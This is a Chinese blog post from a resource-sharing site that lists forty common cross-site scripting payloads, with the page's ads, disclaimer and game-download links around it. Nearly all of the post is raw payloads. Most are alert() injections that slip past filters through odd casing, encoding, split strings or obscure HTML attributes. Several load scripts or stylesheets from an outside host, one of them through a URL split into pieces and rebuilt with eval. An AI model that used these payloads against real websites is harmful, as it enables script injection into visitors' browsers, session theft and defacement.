• webqwe-资源分享和开发经验
AD
AD

Home / 开发 / XSS payload

XSS payload

头像 pings
2023-06-02 22:59:46
0 评论
765 阅读

总结了常用的XSS payload

1.普通的XSS JavaScript注入

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

2.IMG标签XSS使用JavaScript命令

<IMG SRC=1 ONERROR=alert('XSS')>

3.IMG标签无分号无引号

<IMG SRC=javascript:alert('XSS')>

4.IMG标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert('XSS')>

5.HTML编码(必须有分号)

<IMG SRC=javascript:alert("XSS")>

6.修正缺陷IMG标签

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

7.formCharCode标签(计算器)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

8.UTF-8的Unicode编码(计算器)

<IMG SRC=jav..省略..S')>

9.7位的UTF-8的Unicode编码是没有分号的(计算器)

<IMG SRC=jav..省略..S')>

10.十六进制编码也是没有分号(计算器)

<IMG SRC=java..省略..XSS')>

11.嵌入式标签,将Javascript分开

<IMG SRC="jav ascript:alert('XSS');">

12.嵌入式编码标签,将Javascript分开

<IMG SRC="jav ascript:alert('XSS');">

13.嵌入式换行符

<IMG SRC="jav ascript:alert('XSS');">

14.嵌入式回车

<IMG SRC="jav ascript:alert('XSS');">

15.嵌入式多行注入JavaScript,这是XSS极端的例子

<IMG SRC="javascript:alert('XSS')">

16.解决限制字符(要求同页面)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

17.空字符

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

18.空字符2,空字符在国内基本没效果.因为没有地方可以利用

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

19.Spaces和meta前的IMG标签

<IMG SRC=" javascript:alert('XSS');">

20.Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

21.Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

22.Non-alpha-non-digit XSS to 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

23.双开括号

<<SCRIPT>alert(a.sourse);//<</SCRIPT>

24.无结束脚本标记(仅火狐等浏览器)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

25.无结束脚本标记

<SCRIPT SRC=//3w.org/XSS/xss.js>

26.半开的HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

27.双开角括号

<iframe src=http://3w.org/XSS.html >

28.无单引号、双引号、分号

<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>

29.换码过滤的JavaScript

\";alert('XSS');//

30.结束Title标签

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

31.Input Image

<INPUT SRC="javascript:alert('XSS');">

32.BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

33.BODY标签

<BODY('XSS')>

34.IMG Dynsrc

<IMG DYNSRC="javascript:alert('XSS')">

35.IMG Lowsrc

<IMG LOWSRC="javascript:alert('XSS')">

36.BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

37.STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

38.远程样式表

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

39.List-style-image(列表式)

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

40.IMG VBscript

<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS




uuid怎么下载(免费) | 求资源
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。 本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。 如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
标签
XSS
author
pings

每天都在打酱油~

作者其他随机文章
img pings
Navicat Premium 无限试用软件下载
pings
2023-05-01
img pings
SafeUM 0成本无限国外手机号接码
pings
2023-05-01
img pings
oldubil 国外虚拟信用卡
pings
2023-05-01
img pings
Docker-compose安装失败
pings
2023-05-01
img pings
bbr tcp网络加速脚本
pings
2023-05-01
img pings
centos 设置时区和更新系统时间
pings
2023-05-01
评论
登录后评论
随机文章
[游戏]墨西哥英雄大混战2/Guacamelee! 2下载
2024-07-03 09:42:00
158 阅读
[游戏]疯狂连杀/ULTRAKILL下载
2024-07-05 09:37:22
194 阅读
[游戏]僵尸斯塔布斯/Stubbs the Zombie in Rebel Without a Pulse下载
2024-07-05 09:34:30
205 阅读
[游戏]M.A.S.S. Builder下载
2024-07-03 09:50:40
222 阅读
[游戏]警察大追捕/Police Hot Pursuit下载
2024-07-04 08:54:21
199 阅读
[游戏]漫展模拟器/The Con Simulator下载
2024-07-05 09:35:39
230 阅读
[游戏]云中庭/云端花园/Cloud Gardens下载
2024-07-04 08:58:35
187 阅读
[游戏]十字线X/Crosshair X下载
2024-07-03 09:38:38
199 阅读
[游戏]堕落天使/Fallen Angel下载
2024-07-03 09:40:43
219 阅读
[游戏]割韭菜啦/Rip Them Off下载
2024-07-04 08:54:51
184 阅读